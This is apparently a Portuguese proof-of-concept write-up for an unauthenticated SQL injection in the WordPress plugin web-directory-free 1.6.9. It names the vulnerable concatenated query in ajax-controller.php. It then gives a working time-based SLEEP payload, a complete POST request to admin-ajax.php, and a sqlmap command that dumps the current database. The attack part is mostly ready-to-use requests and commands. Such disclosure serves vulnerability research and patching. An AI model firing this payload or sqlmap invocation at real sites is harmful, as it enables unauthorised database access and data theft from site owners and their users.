Contexto

  • Wordpress versão 5.8
  • Plugin web-directory-free versão 1.6.9
  • MySQL versão 5.7

Source code

image

No arquivo ajax-controller.php → classe w2dc_ajax_controller → Função get_map_marker_info

  2. Não escapa ou prepara a entrada $locations_ids = w2dc_getValue($_POST, 'locations_ids');
  3. Concatenada diretamente na consulta SQL. Com $location_id sendo cada elemento em $_POST['locations_ids'] através do loop foreach
root@kitploit:~
$row = $wpdb->get_row("SELECT * FROM {$wpdb->w2dc_locations_relationships} WHERE id=".$location_id, ARRAY_A);

⇒ Ocorre SQL injection

Demonstração

Usando payload =action=w2dc_get_map_marker_info&locations_ids[]=1 AND (SELECT 1 FROM (SELECT IF(1=1,SLEEP(5),0)) AS a)

Requisição:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Length: 110
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/wp-admin/
Accept-Encoding: gzip, deflate, br

action=w2dc_get_map_marker_info&locations_ids[]=1 AND (SELECT 1 FROM (SELECT IF(1=1,SLEEP(5),0)) AS a)

root@kitploit:~
kp@ubuntu:~/Desktop/cve-2024-3552$ sqlmap -u "http://localhost:8080/wp-admin/admin-ajax.php" \
>   --data="action=w2dc_get_map_marker_info&locations_ids[]=1" \
>   -p "locations_ids[]" \
>   --batch --current-db --threads=5
